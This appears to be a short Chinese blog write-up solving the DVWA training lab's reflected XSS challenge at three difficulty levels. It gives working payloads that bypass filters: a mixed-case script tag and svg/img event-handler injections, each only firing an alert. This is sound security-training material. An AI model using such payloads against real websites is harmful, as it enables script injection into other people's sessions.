一、低级low
简单拿捏
<script>alert(123)</script>二、中级middle
源码过滤了script但是没有过滤大小写,改成大写S
<Script>alert(123)</script>三、高级high
比中级高,过滤了script并且以及大小写,使用其他标签,二选一就行
<svg onload=alert(123)>
<img src=x onerror=alert(123)>【dvwa靶场:XSS系列】XSS (Reflected)低-中-高级别,通关啦
假客套2024-11-06 13:19
相关推荐
大方子5 小时前
【PolarCTF】Don‘t touch me未知鱼5 小时前
Python安全开发之子域名扫描器(含详细注释)菜根Sec9 小时前
网络安全冬天怎么过CDN3601 天前
360CDN SDK 游戏盾:轻量化接入 + 强防护实测hzhsec1 天前
MSF-CobaltStrike实现内网socks代理转发上线CDN3601 天前
低成本游戏防护:360 SDK 游戏盾使用总结Chockmans1 天前
春秋云境CVE-2021-46436陈天伟教授2 天前
人工智能应用- 预测新冠病毒传染性:06. M-H 模型:从基因预测传播能力xixixi777772 天前
5G核心网核心之辨:从服务化架构(SBA)到网络切片的深度实践解析IpdataCloud2 天前
网络安防实战:如何用IP查询工具精准定位风险IP?